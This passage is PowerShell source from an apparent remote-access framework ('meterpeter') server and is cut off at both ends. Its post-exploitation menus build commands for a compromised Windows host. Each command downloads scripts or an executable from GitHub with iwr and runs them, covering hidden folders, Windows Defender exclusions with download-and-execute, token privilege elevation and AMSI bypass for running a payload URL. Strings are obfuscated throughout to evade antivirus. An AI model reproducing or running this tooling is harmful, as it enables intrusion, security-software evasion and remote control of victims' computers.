}\r\n If($win_choise -iMatch '^(install)$')\r\n {\r\n $Program = Read-Host \" - Program name \"\r\n If(-not($Program) -or $Program -ieq $null)\r\n {\r\n Write-Host \"`n > Error: program name required to run module!\" -ForegroundColor Red\r\n $Command = $null\r\n }\r\n Else\r\n {\r\n $Id = Read-Host \" - Program ID \"\r\n If(-not($Id) -or $Id -ieq $null)\r\n {\r\n Write-Host \"`n > Error: program ID required to run module!\" -ForegroundColor Red\r\n $Command = $null\r\n }\r\n Else\r\n {\r\n Write-Host \" * Install '$Program' from msstore!\" -ForegroundColor Green;write-host \"\"\r\n $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/Invoke-Winget.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-WinGet.ps1`\"|Out-Null;powershell -file Invoke-WinGet.ps1 -Action 'install' -program '$Program' -Id '$Id' -AutoDelete 'on'\"\r\n }\r\n }\r\n }\r\n If($win_choise -iMatch '^(Uninstall)$')\r\n {\r\n $Program = Read-Host \" - Program name \"\r\n If(-not($Program) -or $Program -ieq $null)\r\n {\r\n Write-Host \"`n > Error: program name required to run module!\" -ForegroundColor Red\r\n $Command = $null\r\n }\r\n Else\r\n {\r\n $Id = Read-Host \" - Program ID \"\r\n If(-not($Id) -or $Id -ieq $null)\r\n {\r\n Write-Host \"`n > Error: program ID required to run module!\" -ForegroundColor Red\r\n $Command = $null\r\n }\r\n Else\r\n {\r\n Write-Host \" * UnInstall '$Program' from local PC!\" -ForegroundColor Green;write-host \"\"\r\n $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/Invoke-Winget.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-WinGet.ps1`\"|Out-Null;powershell -file Invoke-WinGet.ps1 -Action 'Uninstall' -program '$Program' -Id '$Id' -AutoDelete 'on'\"\r\n }\r\n }\r\n }\r\n If($win_choise -ieq \"Return\" -or $win_choise -ieq \"cls\" -or $win_choise -ieq \"modules\" -or $win_choise -ieq \"clear\")\r\n {\r\n $choise = $Null;\r\n $Command = $Null;\r\n $win_choise = $Null;\r\n }\r\n }\r\n If($choise -ieq \"HiddenDir\" -or $choise -ieq \"Hidden\")\r\n {\r\n write-host \"`n`n Description:\" -ForegroundColor Yellow\r\n write-host \" This cmdlet allow users to Query\\Create\\Delete super hidden folders.\"\r\n write-host \" Super hidden folders contains 'hidden, system' attributes set and does\"\r\n write-host \" not show-up in explorer (gui) even if 'show hidden files' its activated.\"\r\n Write-Host \" Remark: Leave the input fields blank to random search for directorys.\" -ForegroundColor Yellow\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green;\r\n write-host \" ------- ----------- ------------------\";\r\n write-host \" Search for regular hidden folders UserLand\";\r\n write-host \" Super Search super hidden folders UserLand\";\r\n write-host \" Create Create\\Modify super hidden UserLand\";\r\n write-host \" Delete One super hidden folder UserLand\";\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow\r\n write-host \"`n`n :meterpeter:Post:Hidden> \" -NoNewline -ForeGroundColor Green;\r\n $Vault_choise = Read-Host;\r\n If($Vault_choise -ieq \"Search\")\r\n {\r\n $FolderName = Read-Host \" - Folder name to search \"\r\n If(-not($FolderName) -or $FolderName -ieq $null)\r\n {\r\n $FolderName = \"false\"\r\n Write-Host \" => Error: wrong FolderName, set demo to 'false' ..\" -ForegroundColor Red\r\n }\r\n\r\n $Directory = Read-Host \" - The directory to scan \"\r\n If(-not($Directory) -or $Directory -ieq $null)\r\n {\r\n $Directory = \"false\"\r\n $Recursive = \"false\"\r\n Write-Host \" => Error: wrong Directory, set demo to 'CommonLocations' ..\" -ForegroundColor Red\r\n }\r\n Else\r\n {\r\n Write-Host \" - Recursive search (y|n):\" -ForeGroundColor Red -NoNewline\r\n $Recursive = Read-Host\r\n If($Recursive -iMatch '^(y|yes)$')\r\n {\r\n $Recursive = \"True\"\r\n }\r\n Else\r\n {\r\n $Recursive = \"false\"\r\n }\r\n }\r\n\r\n Write-Host \" * Enumerating hidden folders!\" -ForegroundColor Green;write-host \"\"\r\n $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/SuperHidden.ps1`\" -OutFile `\"`$Env:TMP\\SuperHidden.ps1`\"|Out-Null;powershell -WindowStyle hidden -File `$Env:TMP\\SuperHidden.ps1 -Action Query -Directory `\"$Directory`\" -FolderName `\"$FolderName`\" -Recursive `\"$Recursive`\" -Attributes `\"Hidden`\";Remove-Item -Path `$Env:TMP\\SuperHidden.ps1 -Force\"\r\n }\r\n If($Vault_choise -ieq \"Super\")\r\n {\r\n $FolderName = Read-Host \" - Folder name to search \"\r\n If(-not($FolderName) -or $FolderName -ieq $null)\r\n {\r\n $FolderName = \"false\"\r\n Write-Host \" => Error: wrong FolderName, set demo to 'false' ..\" -ForegroundColor Red\r\n }\r\n\r\n $Directory = Read-Host \" - The directory to scan \"\r\n If(-not($Directory) -or $Directory -ieq $null)\r\n {\r\n $Directory = \"false\"\r\n $Recursive = \"false\"\r\n Write-Host \" => Error: wrong DirectoryInput, set demo to 'CommonLocations' ..\" -ForegroundColor Red\r\n }\r\n Else\r\n {\r\n Write-Host \" - Recursive search (y|n):\" -ForeGroundColor Red -NoNewline\r\n $Recursive = Read-Host\r\n If($Recursive -iMatch '^(y|yes)$')\r\n {\r\n $Recursive = \"True\"\r\n }\r\n Else\r\n {\r\n $Recursive = \"false\"\r\n }\r\n }\r\n\r\n Write-Host \" * Enumerating super hidden folders.`n\" -ForegroundColor Green\r\n $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/SuperHidden.ps1`\" -OutFile `\"`$Env:TMP\\SuperHidden.ps1`\"|Out-Null;powershell -WindowStyle hidden -File `$Env:TMP\\SuperHidden.ps1 -Action Query -Directory `\"$Directory`\" -FolderName `\"$FolderName`\" -Recursive `\"$Recursive`\";Remove-Item -Path `$Env:TMP\\SuperHidden.ps1 -Force\"\r\n }\r\n If($Vault_choise -ieq \"Create\")\r\n {\r\n Write-Host \" - Create Hidden or Visible dir:\" -ForeGroundColor Red -NoNewline\r\n $Action = Read-Host\r\n If(-not($Action) -or $Action -ieq $null)\r\n {\r\n $Action = \"hidden\"\r\n write-host \" => wrong input, default to '$Action'\" -ForegroundColor Red\r\n }\r\n\r\n $FolderName = Read-Host \" - Folder name to Create\\Modify\"\r\n If(-not($FolderName) -or $FolderName -ieq $null)\r\n {\r\n $FolderName = \"vault\"\r\n write-host \" => wrong input, default to '$FolderName'\" -ForegroundColor Red\r\n }\r\n\r\n $Directory = Read-Host \" - The storage directory to use\"\r\n If(-not($Directory) -or $Directory -ieq $null)\r\n {\r\n $Directory = \"`$Env:TMP\"\r\n write-host \" => wrong input, default to '$Directory'\" -ForegroundColor Red\r\n }\r\n\r\n Write-Host \" * Create\\Modify super hidden folders\" -ForegroundColor Green\r\n $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/SuperHidden.ps1`\" -OutFile `\"`$Env:TMP\\SuperHidden.ps1`\"|Out-Null;powershell -WindowStyle hidden -File `$Env:TMP\\SuperHidden.ps1 -Action $Action -Directory `\"$Directory`\" -FolderName `\"$FolderName`\";Remove-Item -Path `$Env:TMP\\SuperHidden.ps1 -Force\"\r\n }\r\n If($Vault_choise -ieq \"Delete\")\r\n {\r\n Write-Host \" - Folder name to delete:\" -ForeGroundColor Red -NoNewline\r\n $FolderName = Read-Host\r\n If(-not($FolderName) -or $FolderName -ieq $null)\r\n {\r\n $FolderName = \"vault\"\r\n write-host \" => wrong input, default to '$FolderName'\" -ForegroundColor Red\r\n }\r\n\r\n $Directory = Read-Host \" - The storage directory\"\r\n If(-not($Directory) -or $Directory -ieq $null)\r\n {\r\n $Directory = \"`$Env:TMP\"\r\n write-host \" => wrong input, default to '$Directory'\" -ForegroundColor Red\r\n }\r\n\r\n Write-Host \" * Delete super hidden folders\" -ForegroundColor Green\r\n $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/SuperHidden.ps1`\" -OutFile `\"`$Env:TMP\\SuperHidden.ps1`\"|Out-Null;powershell -WindowStyle hidden -File `$Env:TMP\\SuperHidden.ps1 -Action Delete -Directory `\"$Directory`\" -FolderName `\"$FolderName`\";Remove-Item -Path `$Env:TMP\\SuperHidden.ps1 -Force\"\r\n }\r\n If($Vault_choise -ieq \"Return\" -or $Vault_choise -ieq \"cls\" -or $Vault_choise -ieq \"modules\" -or $Vault_choise -ieq \"clear\")\r\n {\r\n $choise = $Null;\r\n $Command = $Null;\r\n $Vault_choise = $Null;\r\n } \r\n }\r\n If($choise -ieq \"Exclusions\")\r\n {\r\n $Obione = \"Ex@clu@sionPa@th\" -replace '@',''\r\n $Obitwo = \"@Ex@clus@io@nPr@oc@es@s\" -replace '@',''\r\n $Obitre = \"Ex@cl@us@@ion@E@xt@en@@sion\" -replace '@',''\r\n write-host \"`n`n Description:\" -ForegroundColor Yellow;\r\n write-host \" Manage Windows Defender exclusions (query, create, delete).\"\r\n write-host \" Types: $Obitre, $Obitwo, $Obione,ExclusionIpAddress.\"\r\n write-host \" The files covered by the exclusion definition will be excluded from Defender\"\r\n write-host \" Real-time protection, proactive monitoring, Scheduled scans, On-demand scans.\"\r\n write-host \" Remark: URI will be upload to %TMP% and not deleted after execution.\" -ForegroundColor Yellow\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green;\r\n write-host \" ------- ----------- -------------------\";\r\n write-host \" Query Query all Defender exclusions \" -NoNewline\r\n write-host \"Administrator\" -ForegroundColor Red;\r\n write-host \" Create Create a new Defender exclusion \" -NoNewline\r\n write-host \"Administrator\" -ForegroundColor Red;\r\n write-host \" UrlExec Download\\Exec through exclusion \" -NoNewline\r\n write-host \"Administrator\" -ForegroundColor Red;\r\n write-host \" Delete Delete one Defender exclusion \" -NoNewline\r\n write-host \"Administrator\" -ForegroundColor Red;\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow;\r\n write-host \"`n`n :meterpeter:Post:Exclusions> \" -NoNewline -ForeGroundColor Green;\r\n $WD_choise = Read-Host;\r\n If($WD_choise -ieq \"Query\")\r\n {\r\n #Execute command remote\r\n write-host \" * Query for Defender exclusions.`n`n\" -ForegroundColor Green\r\n $Command = \"`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/WD-Bypass/Invoke-Exclusions.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-Exclusions.ps1`\";powershell -file `\"`$Env:TMP\\Invoke-Exclusions.ps1`\" -Action 'query';Remove-Item -Path `\"`$Env:TMP\\Invoke-Exclusions.ps1`\" -Force}Else{echo `\" `> Error: administrator privileges required.`\" `> `$Env:TMP\\fddds.log;Get-Content -Path `\"`$Env:TMP\\fddds.log`\";Remove-Item -Path `\"`$Env:TMP\\fddds.log`\" -Force}\"\r\n }\r\n If($WD_choise -ieq \"Create\")\r\n {\r\n write-host \" - $Obitre, $Obitwo, $Obione, Exc`lusionIpAd`dress: \" -ForeGroundColor Red -NoNewline;\r\n $ExcludeType = Read-Host;\r\n If(-not($ExcludeType) -or $ExcludeType -eq $null)\r\n {\r\n $ExcludeType = \"$Obione\"\r\n }\r\n write-host \" - Exclude from Defender scans: \" -ForeGroundColor Red -NoNewline;\r\n $ExcludePath = Read-Host;\r\n If(-not($ExcludePath) -or $ExcludePath -eq $null)\r\n {\r\n $ExcludePath = \"`$Env:TMP\"\r\n }\r\n\r\n #Execute command remote\r\n write-host \" * Create a new Defender exclusion.`n`n\" -ForegroundColor Green\r\n $Command = \"`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/WD-Bypass/Invoke-Exclusions.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-Exclusions.ps1`\";powershell -file `\"`$Env:TMP\\Invoke-Exclusions.ps1`\" -Action 'add' -Type `\"$ExcludeType`\" -Exclude `\"$ExcludePath`\";Remove-Item -Path `\"`$Env:TMP\\Invoke-Exclusions.ps1`\" -Force}Else{echo `\" `> Error: administrator privileges required.`\" `> `$Env:TMP\\fddds.log;Get-Content -Path `\"`$Env:TMP\\fddds.log`\";Remove-Item -Path `\"`$Env:TMP\\fddds.log`\" -Force}\"\r\n }\r\n If($WD_choise -ieq \"UrlExec\")\r\n {\r\n write-host \" - $Obitre, $Obitwo, $Obione, Exclu`sionIpAd`dress: \" -ForeGroundColor Red -NoNewline;\r\n $ExcludeType = Read-Host;\r\n If(-not($ExcludeType) -or $ExcludeType -eq $null)\r\n {\r\n $ExcludeType = \"$Obione\"\r\n }\r\n write-host \" - The URL to be downloaded: \" -NoNewline;\r\n $UriLink = Read-Host;\r\n If(-not($UriLink) -or $UriLink -eq $null)\r\n {\r\n Write-Host \"x Error: none URL sellected ..`n\" -ForegroundColor Red\r\n $Command = $Null\r\n }\r\n Else\r\n {\r\n write-host \" - Arguments: \" -NoNewline;\r\n $Arguments = Read-Host;\r\n write-host \" * Create a new Defender exclusion.`n`n\" -ForegroundColor Green\r\n If(-not($Arguments) -or $Arguments -eq $null)\r\n {\r\n #Execute command remote\r\n $Command = \"`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/WD-Bypass/Invoke-Exclusions.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-Exclusions.ps1`\";powershell -file `\"`$Env:TMP\\Invoke-Exclusions.ps1`\" -Action 'exec' -Type `\"$ExcludeType`\" -Exclude `\"`$Env:TMP`\" -Uri `\"$UriLink`\";Remove-Item -Path `\"`$Env:TMP\\Invoke-Exclusions.ps1`\" -Force}Else{echo `\" `> Error: administrator privileges required.`\" `> `$Env:TMP\\fddds.log;Get-Content -Path `\"`$Env:TMP\\fddds.log`\";Remove-Item -Path `\"`$Env:TMP\\fddds.log`\" -Force}\" \r\n }\r\n Else\r\n {\r\n #Execute command remote\r\n $Command = \"`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/WD-Bypass/Invoke-Exclusions.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-Exclusions.ps1`\";powershell -file `\"`$Env:TMP\\Invoke-Exclusions.ps1`\" -Action 'exec' -Type `\"$ExcludeType`\" -Exclude `\"`$Env:TMP`\" -Uri `\"$UriLink`\" -Arguments `\"$Arguments`\";Remove-Item -Path `\"`$Env:TMP\\Invoke-Exclusions.ps1`\" -Force}Else{echo `\" `> Error: administrator privileges required.`\" `> `$Env:TMP\\fddds.log;Get-Content -Path `\"`$Env:TMP\\fddds.log`\";Remove-Item -Path `\"`$Env:TMP\\fddds.log`\" -Force}\"\r\n }\r\n }\r\n }\r\n If($WD_choise -ieq \"Delete\")\r\n {\r\n write-host \" - $Obitre, $Obitwo, $Obione, Exclu`sionIpAd`dress: \" -ForeGroundColor Red -NoNewline;\r\n $ExcludeType = Read-Host;\r\n If(-not($ExcludeType) -or $ExcludeType -eq $null)\r\n {\r\n $ExcludeType = \"$Obione\"\r\n }\r\n write-host \" - Exclusion entry to delete: \" -ForeGroundColor Red -NoNewline;\r\n $ExcludePath = Read-Host;\r\n If(-not($ExcludePath) -or $ExcludePath -eq $null)\r\n {\r\n $ExcludePath = \"`$Env:TMP\"\r\n }\r\n\r\n #Execute command remote\r\n write-host \" * Delete one Defender exclusion.`n`n\" -ForegroundColor Green\r\n $Command = \"`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/WD-Bypass/Invoke-Exclusions.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-Exclusions.ps1`\";powershell -file `\"`$Env:TMP\\Invoke-Exclusions.ps1`\" -Action 'del' -Type `\"$ExcludeType`\" -Exclude `\"$ExcludePath`\";Remove-Item -Path `\"`$Env:TMP\\Invoke-Exclusions.ps1`\" -Force}Else{echo `\" `> Error: administrator privileges required.`\" `> `$Env:TMP\\fddds.log;Get-Content -Path `\"`$Env:TMP\\fddds.log`\";Remove-Item -Path `\"`$Env:TMP\\fddds.log`\" -Force}\"\r\n }\r\n If($WD_choise -ieq \"Return\" -or $WD_choise -ieq \"cls\" -or $WD_choise -ieq \"Modules\" -or $WD_choise -ieq \"clear\")\r\n {\r\n $choise = $Null;\r\n $Command = $Null;\r\n $WD_choise = $Null;\r\n $ExcludeType = $Null;\r\n $ExcludePath = $Null;\r\n }\r\n }\r\n If($choise -ieq \"Allprivs\")\r\n {\r\n write-host \"`n`n Description:\" -ForegroundColor Yellow;\r\n write-host \" This function uses 'EnableAllParentPrivileges'\"\r\n write-host \" (by: @gtworek) to elevate shell token privileges.\"\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green\r\n write-host \" ------- ----------- -------------------\";\r\n write-host \" demo Enable all token privileges (client) \" -NoNewline\r\n write-host \"Administrator\" -ForegroundColor Red;\r\n write-host \" cmdline Execute 1 cmdline with full privileges \" -NoNewline\r\n write-host \"Administrator\" -ForegroundColor Red;\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow;\r\n write-host \"`n`n :meterpeter:Post:Allprivs> \" -NoNewline -ForeGroundColor Green;\r\n $all_choise = Read-Host;\r\n If($all_choise -ieq \"demo\")\r\n {\r\n #Execute command remote\r\n $CmdlineToExecute = \"whoami /priv|Out-File myprivileges.log -Force\"\r\n write-host \" * Elevating all process privileges (demo).\" -ForegroundColor Green\r\n $Command = \"`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/utils/EnableAllParentPrivileges.exe`\" -OutFile `\"`$Env:TMP\\EnableAllParentPrivileges.exe`\"|Unblock-File;cd `$Env:TMP;.\\EnableAllParentPrivileges.exe;$CmdlineToExecute;Remove-Item -Path `\"`$Env:TMP\\EnableAllParentPrivileges.exe`\" -Force;Get-Content myprivileges.log;Remove-Item myprivileges.log -Force}Else{echo `\" `> Error: administrator privileges required on remote`\" `> `$Env:TMP\\fddds.log;Get-Content -Path `\"`$Env:TMP\\fddds.log`\";Remove-Item -Path `\"`$Env:TMP\\fddds.log`\" -Force}\"\r\n }\r\n If($all_choise -ieq \"cmdline\")\r\n {\r\n write-host \" - cmdline to execute: \" -ForeGroundColor Red -NoNewline;\r\n $CmdlineToExecute = Read-Host;\r\n If(-not($CmdlineToExecute) -or $CmdlineToExecute -eq $null)\r\n {\r\n #Demonstration cmdline that executes whoami /priv and stores results on logfile to display on console terminal\r\n $CmdlineToExecute = \"whoami /priv|Out-File myprivileges.log -Force;Start-Sleep -Seconds 1;Get-Content myprivileges.log;Remove-Item myprivileges.log -Force\"\r\n }\r\n\r\n #Execute command remote\r\n write-host \" * Elevating all process privileges.\" -ForegroundColor Green\r\n $Command = \"`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/utils/EnableAllParentPrivileges.exe`\" -OutFile `\"`$Env:TMP\\EnableAllParentPrivileges.exe`\"|Unblock-File;cd `$Env:TMP;.\\EnableAllParentPrivileges.exe;$CmdlineToExecute;Remove-Item -Path `\"`$Env:TMP\\EnableAllParentPrivileges.exe`\" -Force}Else{echo `\" `> Error: administrator privileges required on remote`\" `> `$Env:TMP\\fddds.log;Get-Content -Path `\"`$Env:TMP\\fddds.log`\";Remove-Item -Path `\"`$Env:TMP\\fddds.log`\" -Force}\"\r\n }\r\n If($all_choise -ieq \"Return\" -or $all_choise -ieq \"cls\" -or $all_choise -ieq \"Modules\" -or $all_choise -ieq \"clear\")\r\n {\r\n $choise = $Null;\r\n $Command = $Null;\r\n $all_choise = $Null;\r\n }\r\n }\r\n If($choise -ieq \"AMSIpatch\")\r\n {\r\n write-host \"`n`n Description:\" -ForegroundColor Yellow;\r\n write-host \" This cmdlet attempts to disable AMS1 string scanning within\"\r\n write-host \" the current process context (terminal console) It also allow is\"\r\n write-host \" users to execute any inputed script trough AMS1 bypa`ss technic.\";\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green;\r\n write-host \" ------- ----------- -------------------\";\r\n write-host \" Console Disable AMS1 within current process UserLand\";\r\n write-host \" FilePath Execute input script trough bypa`ss UserLand\";\r\n write-host \" PayloadUrl Download\\Execute script trough bypa`ss UserLand\";\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow;\r\n write-host \"`n`n :meterpeter:Post:AMS`IPatch> \" -NoNewline -ForeGroundColor Green;\r\n $Patch_choise = Read-Host;\r\n If($Patch_choise -ieq \"Console\")\r\n {\r\n write-host \" * Disable AMS1 within current process`n\" -ForegroundColor Green\r\n write-host \"`n Technic Description\" -ForegroundColor DarkYellow\r\n write-host \" ------- -----------\"\r\n write-host \" 2 FORC`E_AM`SI_ERROR\"\r\n write-host \" 3 AM`SI_UT`ILS_P`AT`CH`n\"\r\n\r\n write-host \" - Bypa`ss technic to use (2|3) : \" -ForeGroundColor Red -NoNewline;\r\n $Technic = Read-Host;\r\n $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/Invoke-Bypass.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-Bypass.ps1`\"|Unblock-File;powershell -file `$Env:TMP\\Invoke-Bypass.ps1 -technic `\"$Technic`\" -Egg true\"\r\n }\r\n If($Patch_choise -ieq \"FilePath\")\r\n {\r\n write-host \" - Bypa`ss technic to use (2|3) : \" -ForeGroundColor Red -NoNewline;\r\n $Technic = Read-Host;\r\n write-host \" - Execute script trough byp`ass : \" -NoNewline;\r\n $FilePath = Read-Host;\r\n write-host \" - Exec script with args? (y|n) : \" -NoNewline;\r\n $MArs = Read-Host;\r\n\r\n If($MArs -iMatch '^(y|yes)$')\r\n {\r\n write-host \" - Input script arguments : \" -ForeGroundColor Red -NoNewline;\r\n $FileArgs = Read-Host;\r\n $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bypass/Invoke-Bypass.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-Bypass.ps1`\"|Unblock-File;powershell -file `$Env:TMP\\Invoke-Bypass.ps1 -technic `\"$Technic`\" -filepath `\"$FilePath`\" -fileargs `\"$FileArgs`\";Remove-Item -Path `\"`$Env:TMP\\Invoke-Bypass.ps1`\" -Force\";\r\n }\r\n Else\r\n {\r\n $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bypass/Invoke-Bypass.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-Bypass.ps1`\"|Unblock-File;powershell -file `$Env:TMP\\Invoke-Bypass.ps1 -technic `\"$Technic`\" -filepath `\"$FilePath`\";Remove-Item -Path `\"`$Env:TMP\\Invoke-Bypass.ps1`\" -Force\" \r\n }\r\n }\r\n If($Patch_choise -ieq \"PayloadUrl\")\r\n {\r\n write-host \" - Byp`ass technic to use (2|3) : \" -ForeGroundColor Red -NoNewline;\r\n $Technic = Read-Host;\r\n write-host \" - The Paylo`ad Url link : \" -NoNewline;\r\n $PayloadUrl = Read-Host;\r\n write-host \" - Exec script with args? (y|n) : \" -NoNewline;\r\n $MArs = Read-Host;\r\n\r\n If($MArs -iMatch '^(y|yes)$')\r\n {\r\n write-host \" - Input script arguments : \" -ForeGroundColor Red -NoNewline;\r\n $FileArgs = Read-Host;\r\n $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bypass/Invoke-Bypass.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-Bypass.ps1`\"|Unblock-File;powershell -file `$Env:TMP\\Invoke-Bypass.ps1 -technic `\"$Technic`\" -Payloadurl `\"$PayloadUrl`\" -fileargs `\"$FileArgs`\";Remove-Item -Path `\"`$Env:TMP\\Invoke-Bypass.ps1`\" -Force\";\r\n }\r\n Else\r\n {\r\n $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bypass/Invoke-Bypass.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-Bypass.ps1`\"|Unblock-File;powershell -file `$Env:TMP\\Invoke-Bypass.ps1 -technic `\"$Technic`\" -payloadurl `\"$PayloadUrl`\";Remove-Item -Path `\"`$Env:TMP\\Invoke-Bypass.ps1`\" -Force\";\r\n }\r\n }\r\n If($Patch_choise -ieq \"Return\" -or $Patch_choise -ieq \"cls\" -or $Patch_choise -ieq \"Modules\" -or $Patch_choise -ieq \"clear\")\r\n {\r\n $choise = $Null;\r\n $Command = $Null;\r\n $Patch_choise = $Null;\r\n }\r\n }\r\n If($choise -ieq \"FindEop\" -or $choise -ieq \"EOP\")\r\n {\r\n write-host \"`n`n Remark:\" -ForegroundColor Yellow;\r\n write-host \" None of the modules in this sub-category will try to exp`loit any\";\r\n write-host \" weak permissions found. They will only report the vulnerability.\";\r\n write-host \" Agressive scans takes 3 to 8 minuts depending of scan sellected.\" -ForeGroundColor DarkYellow\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green;\r\n write-host \" ------- ----------- -------------------\";\r\n write-host \" Check Retrieve directory permissions UserLand\";\r\n write-host \" Service Search for unquoted service paths UserLand\";\r\n write-host \" RottenP Search For rotten potato vuln UserLand\";\r\n write-host \" Agressive Search all EOP possible entrys UserLand\";\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow;\r\n write-host \"`n`n :meterpeter:Post:Eop> \" -NoNewline -ForeGroundColor Green;\r\n $my_choise = Read-Host;\r\n If($my_choise -ieq \"Agressive\")\r\n {\r\n write-host \" - Use agressive reports? (y|n): \" -NoNewline;\r\n $VerOut = Read-Host;\r\n Write-Host \" * Search for ALL EOP possible entrys.\" -ForegroundColor Green;Start-Sleep -Seconds 1;\r\n If($VerOut -iMatch '^(y|yes)$')\r\n {\r\n Write-Host \" => Remark: Module takes aprox 8 minuts to finish ..\" -ForegroundColor Yellow;write-host \"`n\";\r\n $Command = \"iwr -Uri https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/FindEop.ps1 -OutFile FindEOP.ps1;powershell -file FindEOP.ps1 -verb true;Remove-Item -Path FindEOP.ps1 -Force\"\r\n }\r\n Else\r\n {\r\n Write-Host \" => Remark: Module takes aprox 3 minuts to finish ..\" -ForegroundColor Yellow;write-host \"`n\";\r\n $Command = \"iwr -Uri https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/FindEop.ps1 -OutFile `$Env:TMP\\FindEOP.ps1;powershell -File `$Env:TMP\\FindEOP.ps1;Remove-Item -Path `\"`$Env:TMP\\FindEOP.ps1`\" -Force\"\r\n }\r\n }\r\n If($my_choise -ieq \"Check\" -or $my_choise -ieq \"check\")\r\n {\r\n write-host \" - Input Remote Folder Path (`$Env:TMP): \" -NoNewline\r\n $RfPath = Read-Host\r\n\r\n write-host \" * Enumerate folder permissions (icacls).\" -ForegroundColor Green\r\n If(-not($RfPath))\r\n {\r\n $RfPath = \"$Env:TMP\"\r\n write-host \" => Error: wrong input, default to: $RfPath\" -ForegroundColor Red\r\n Start-Sleep -Milliseconds 700\r\n }\r\n\r\n write-host \"\"\r\n $Command = \"icacls `\"$RfPath`\" `> dellog.txt;Get-Content dellog.txt;remove-item dellog.txt -Force\";\r\n }\r\n If($my_choise -ieq \"Service\" -or $my_choise -ieq \"service\")\r\n {\r\n write-host \" * Enumerate unquoted service paths.`n\" -ForegroundColor Green;\r\n $Command = \"gwmi -class Win32_Service -Property Name,PathName,StartMode|Where-Object{`$_.StartMode -eq `\"Auto`\" -and `$_.PathName -notlike `\"C:\\Windows*`\" -and `$_.PathName -NotMatch '`\"'}|Select-Object Name,PathName `> WeakFP.txt;Get-Content WeakFP.txt;remove-item WeakFP.txt -Force\";\r\n }\r\n If($my_choise -ieq \"RottenP\" -or $my_choise -ieq \"rotten\")\r\n {\r\n $myLine = \"SeIm\" + \"person\" + \"atePriv\" + \"ilege\" -join ''\r\n $DebugPriv = \"SeD\" + \"ebugPriv\" + \"ileges\" -join ''\r\n write-host \" * Searching rotten potato vuln settings.`n\" -ForegroundColor Green\r\n $Command = \"`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){echo `\" `> Error: this module cant not run with admin Privileges`\" `> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force}else{cmd /R whoami /priv|findstr /i /C:`\"$myLine`\" /C:`\"SeAssignPrimaryPrivilege`\" /C:`\"SeTcbPrivilege`\" /C:`\"SeBackupPrivilege`\" /C:`\"SeRestorePrivilege`\" /C:`\"SeCreateTokenPrivilege`\" /C:`\"SeLoadDriverPrivilege`\" /C:`\"SeTakeOwnershipPrivilege`\" /C:`\"$DebugPriv`\" `> dellog.txt;`$check_ACL = get-content dellog.txt|findstr /i /C:`\"Enabled`\";If(`$check_ACL){echo `\" Rotten Potato Vulnerable Settings Found [Enabled] ..`\" `> test.txt;Get-Content test.txt;Remove-Item test.txt -Force;Get-Content 